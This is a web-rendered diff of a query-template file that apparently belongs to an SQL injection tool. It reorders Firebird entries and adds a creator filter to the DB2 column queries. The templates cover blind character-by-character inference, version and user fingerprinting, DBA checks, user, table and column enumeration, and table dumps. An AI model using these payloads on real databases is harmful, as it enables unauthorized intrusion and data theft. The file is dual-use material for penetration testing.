<concatenate query="%s||%s"/>
|
||||||
<case query="SELECT IIF(%s,1,0)"/>
|
<case query="SELECT IIF(%s,1,0)"/>
|
||||||
|
<inference query="ASCII_VAL(SUBSTRING((%s) FROM %d FOR 1)) > %d" dbms_version=">=2.1" query2="SUBSTRING((%s) FROM %d FOR 1) > '%c'"/>
|
||||||
<banner query="SELECT RDB$GET_CONTEXT('SYSTEM','ENGINE_VERSION') FROM RDB$DATABASE" dbms_version=">=2.1"/>
|
<banner query="SELECT RDB$GET_CONTEXT('SYSTEM','ENGINE_VERSION') FROM RDB$DATABASE" dbms_version=">=2.1"/>
|
||||||
<current_user query="SELECT CURRENT_USER FROM RDB$DATABASE"/>
|
<current_user query="SELECT CURRENT_USER FROM RDB$DATABASE"/>
|
||||||
<current_db query="SELECT RDB$GET_CONTEXT('SYSTEM','DB_NAME') FROM RDB$DATABASE"/>
|
<current_db query="SELECT RDB$GET_CONTEXT('SYSTEM','DB_NAME') FROM RDB$DATABASE"/>
|
||||||
<hostname/>
|
<hostname/>
|
||||||
|
<is_dba query="CURRENT_USER='SYSDBA'"/>
|
||||||
<users>
|
<users>
|
||||||
<inband query="SELECT RDB$USER FROM RDB$USER_PRIVILEGES"/>
|
<inband query="SELECT RDB$USER FROM RDB$USER_PRIVILEGES"/>
|
||||||
<blind query="SELECT FIRST 1 SKIP %d DISTINCT(RDB$USER) FROM RDB$USER_PRIVILEGES" count="SELECT COUNT(DISTINCT(RDB$USER)) FROM RDB$USER_PRIVILEGES"/>
|
<blind query="SELECT FIRST 1 SKIP %d DISTINCT(RDB$USER) FROM RDB$USER_PRIVILEGES" count="SELECT COUNT(DISTINCT(RDB$USER)) FROM RDB$USER_PRIVILEGES"/>
|
||||||
</users>
|
</users>
|
||||||
<inference query="ASCII_VAL(SUBSTRING((%s) FROM %d FOR 1)) > %d" dbms_version=">=2.1" query2="SUBSTRING((%s) FROM %d FOR 1) > '%c'"/>
|
|
||||||
<is_dba query="CURRENT_USER='SYSDBA'"/>
|
|
||||||
<tables>
|
<tables>
|
||||||
<inband query="SELECT RDB$RELATION_NAME FROM RDB$RELATIONS WHERE RDB$VIEW_BLR IS NULL AND (RDB$SYSTEM_FLAG IS NULL OR RDB$SYSTEM_FLAG = 0)"/>
|
<inband query="SELECT RDB$RELATION_NAME FROM RDB$RELATIONS WHERE RDB$VIEW_BLR IS NULL AND (RDB$SYSTEM_FLAG IS NULL OR RDB$SYSTEM_FLAG = 0)"/>
|
||||||
<blind query="SELECT FIRST 1 SKIP %d RDB$RELATION_NAME FROM RDB$RELATIONS WHERE RDB$VIEW_BLR IS NULL AND (RDB$SYSTEM_FLAG IS NULL OR RDB$SYSTEM_FLAG = 0)" count="SELECT COUNT(RDB$RELATION_NAME) FROM RDB$RELATIONS WHERE RDB$VIEW_BLR IS NULL AND (RDB$SYSTEM_FLAG IS NULL OR RDB$SYSTEM_FLAG = 0)"/>
|
<blind query="SELECT FIRST 1 SKIP %d RDB$RELATION_NAME FROM RDB$RELATIONS WHERE RDB$VIEW_BLR IS NULL AND (RDB$SYSTEM_FLAG IS NULL OR RDB$SYSTEM_FLAG = 0)" count="SELECT COUNT(RDB$RELATION_NAME) FROM RDB$RELATIONS WHERE RDB$VIEW_BLR IS NULL AND (RDB$SYSTEM_FLAG IS NULL OR RDB$SYSTEM_FLAG = 0)"/>
|
||||||
|
|
@ -603,8 +603,8 @@
|
||||||
<blind query="SELECT tabname FROM (SELECT ROW_NUMBER() OVER () AS LIMIT,tabname FROM sysstat.tables WHERE tabschema='%s') AS foobar WHERE LIMIT=INT('%d')" count="SELECT COUNT(*) FROM sysstat.tables WHERE tabschema='%s'"/>
|
<blind query="SELECT tabname FROM (SELECT ROW_NUMBER() OVER () AS LIMIT,tabname FROM sysstat.tables WHERE tabschema='%s') AS foobar WHERE LIMIT=INT('%d')" count="SELECT COUNT(*) FROM sysstat.tables WHERE tabschema='%s'"/>
|
||||||
</tables>
|
</tables>
|
||||||
<columns>
|
<columns>
|
||||||
<inband query="SELECT name,RTRIM(coltype)||CHR(40)||RTRIM(CAST(length AS CHAR(254)))||CHR(41) FROM sysibm.syscolumns WHERE tbname='%s'" condition="name"/>
|
<inband query="SELECT name,RTRIM(coltype)||CHR(40)||RTRIM(CAST(length AS CHAR(254)))||CHR(41) FROM sysibm.syscolumns WHERE tbname='%s' AND tbcreator='%s'" condition="name"/>
|
||||||
<blind query="SELECT name FROM sysibm.syscolumns WHERE tbname='%s'" query2="SELECT RTRIM(coltype)||CHR(40)||RTRIM(CAST(length AS CHAR(254)))||CHR(41) FROM sysibm.syscolumns WHERE tbname='%s' AND name='%s'" count="SELECT COUNT(name) FROM sysibm.syscolumns WHERE tbname='%s'" condition="name"/>
|
<blind query="SELECT name FROM sysibm.syscolumns WHERE tbname='%s' AND tbcreator='%s'" query2="SELECT RTRIM(coltype)||CHR(40)||RTRIM(CAST(length AS CHAR(254)))||CHR(41) FROM sysibm.syscolumns WHERE tbname='%s' AND name='%s' AND tbcreator='%s'" count="SELECT COUNT(name) FROM sysibm.syscolumns WHERE tbname='%s' AND tbcreator='%s'" condition="name"/>
|
||||||
</columns>
|
</columns>
|
||||||
<dump_table>
|
<dump_table>
|
||||||
<inband query="SELECT %s FROM %s"/>
|
<inband query="SELECT %s FROM %s"/>
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue
Block a user